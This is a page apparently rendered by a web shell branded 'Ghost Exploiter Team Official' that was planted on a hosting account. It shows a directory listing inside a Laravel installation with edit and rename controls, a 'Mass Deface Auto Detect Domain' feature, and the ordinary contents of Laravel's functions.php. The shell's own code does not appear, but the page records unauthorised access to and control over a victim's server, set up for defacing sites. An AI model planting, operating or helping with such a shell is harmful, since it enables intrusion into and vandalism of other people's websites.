webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Filesystem
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
AwsS3V3Adapter.php
4.154KB
edt
ren
Filesystem.php
19.471KB
edt
ren
FilesystemAdapter.php
25.326KB
edt
ren
FilesystemManager.php
11.4KB
edt
ren
FilesystemServiceProvid
...
1.705KB
edt
ren
LICENSE.md
1.05KB
edt
ren
LockableFile.php
3.517KB
edt
ren
composer.json
1.876KB
edt
ren
functions.php
0.599KB
edt
ren
<?php namespace Illuminate\Filesystem; if (! function_exists('Illuminate\Filesystem\join_paths')) { /** * Join the given paths together. * * @param string|null $basePath * @param string ...$paths * @return string */ function join_paths($basePath, ...$paths) { foreach ($paths as $index => $path) { if (empty($path)) { unset($paths[$index]); } else { $paths[$index] = DIRECTORY_SEPARATOR.ltrim($path, DIRECTORY_SEPARATOR); } } return $basePath.implode('', $paths); } }